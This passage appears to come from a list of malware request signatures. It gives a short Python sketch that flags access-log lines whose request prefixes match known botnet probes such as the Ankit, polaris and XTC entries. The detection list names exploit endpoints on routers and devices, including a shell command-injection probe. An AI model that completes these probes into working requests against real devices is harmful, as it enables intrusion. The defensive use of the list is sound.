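Several of the Malware entries above (Ankit, Hello, world, polaris botnet, XTC) are recognizable by the request they send rather than by their user agent. The following Python sketch shows one way such requests might be flagged in an access log. The request prefixes are taken from the notes in this list, but shortening the "Hello, world" request to the prefix `GET /shell?cd+/tmp` is my own assumption, and the function name `match_signature` is hypothetical.

```python
# Request-line prefixes quoted in the Malware entries of this list, mapped to
# the entry that reported them. The "Hello, world" prefix is a shortened form
# of the full request and is an assumption made for this sketch.
MALWARE_SIGNATURES = {
    "POST /cgi-bin/ViewLog.asp": "Ankit",
    "POST /boaform/admin/formPing": "polaris botnet",
    "POST /cgi-bin/mainfunction.cgi": "XTC",
    "GET /shell?cd+/tmp": "Hello, world",
}


def match_signature(request_line):
    """Return the list entry whose signature prefixes the request line, or None."""
    for prefix, entry in MALWARE_SIGNATURES.items():
        if request_line.startswith(prefix):
            return entry
    return None


print(match_signature("POST /cgi-bin/ViewLog.asp HTTP/1.1"))
print(match_signature("GET /index.html HTTP/1.1"))
```

A match only says that the request looks like one of the probes described above. Other clients may send the same request under a different user agent, so treat the result as a hint, not as an identification.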